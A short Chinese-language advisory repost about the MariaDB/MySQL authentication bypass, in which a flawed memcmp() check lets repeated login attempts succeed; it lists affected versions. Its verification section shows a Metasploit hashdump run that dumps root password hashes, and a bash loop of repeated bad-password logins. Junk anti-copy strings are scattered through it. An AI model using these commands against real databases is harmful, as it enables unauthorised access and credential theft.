当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。! H$ |- H: U$ [" E6 Q5 u
0 |- }1 I- T+ t+ H0 S
也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。而且漏洞利用工具已经出现。( `; W. \. C' x6 z8 B3 }* q
. D( W+ h# w; D$ J
受影响的产品:
/ W' v& A; j7 M. I+ ?( WAll MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are2 X3 R7 S0 H4 b5 c s
vulnerable.2 D, O: r0 B4 k; _: ~7 `0 z/ _* N7 p
MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.4 `7 \$ n- X' ?7 C+ s, C7 g! ?' N6 y
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.
9 R8 Z* D. P9 |) s3 s: D$ W
f9 Y6 u4 N2 L4 c5 }2 _" C! Q验证方法:
5 t* x) U6 m3 T) h2 p. h2 [6 e! q6 R) u1 ?' q
$ msfconsole msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump msf auxiliary(mysql_authbypass_hashdump) > set USERNAME root msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 127.0.0.1 msf auxiliary(mysql_authbypass_hashdump) > run [+] 127.0.0.1:3306 The server allows logins, proceeding with bypass test [*] 127.0.0.1:3306 Authentication bypass is 10% complete [*] 127.0.0.1:3306 Authentication bypass is 20% complete [*] 127.0.0.1:3306 Successfully bypassed authentication after 205 attempts [+] 127.0.0.1:3306 Successful exploited the authentication bypass flaw, dumping hashes… [+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D [+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D [+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D [+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D [+] 127.0.0.1:3306 Saving HashString as Loot: debian-sys-maint:*C59FFB311C358B4EFD4F0B82D9A03CBD77DC7C89 [*] 127.0.0.1:3306 Hash Table has been saved: 20120611013537_default_127.0.0.1_mysql.hashes_889573.txt [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed' l/ n& U. H% h h( H& x
c: k- U1 Z, Y3 V. W $ for i in `seq 1 1000`; do mysql -u root –password=bad -h 127.0.0.1 2>/dev/null; done mysql>
- c2 T) o9 ]$ ?4 d4 G |